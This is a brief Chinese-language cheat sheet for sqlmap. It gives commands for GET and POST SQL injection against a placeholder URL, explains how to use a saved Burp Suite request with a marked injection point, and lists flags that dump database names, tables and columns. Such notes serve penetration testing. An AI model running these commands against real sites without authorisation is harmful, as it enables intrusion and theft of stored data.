sqlmap数据库注入
get方式注入:
sqlmap.py -u "https://www.abc.com?a=111&w=111" -batch
post方法注入:
sqlmap.py -u "https://www.abc.com" --data="a=111&w=111" -batch
sqlmap盲注
-r burpsuite请求数据包保存成xx.txt文件,在对应注入的位置画*
sqlmap -r xx.txt 进行注入
–level 注入等级,2时可以测试cookie,HTTP User-Agent/Referer头在level为3的时候就会测试
-p 指定注入的参数
-u 网站url
–current-db 爆数据库 (或者 --dbs)
–tables 爆表
–columns 爆列
–batch 自动选择(y/n)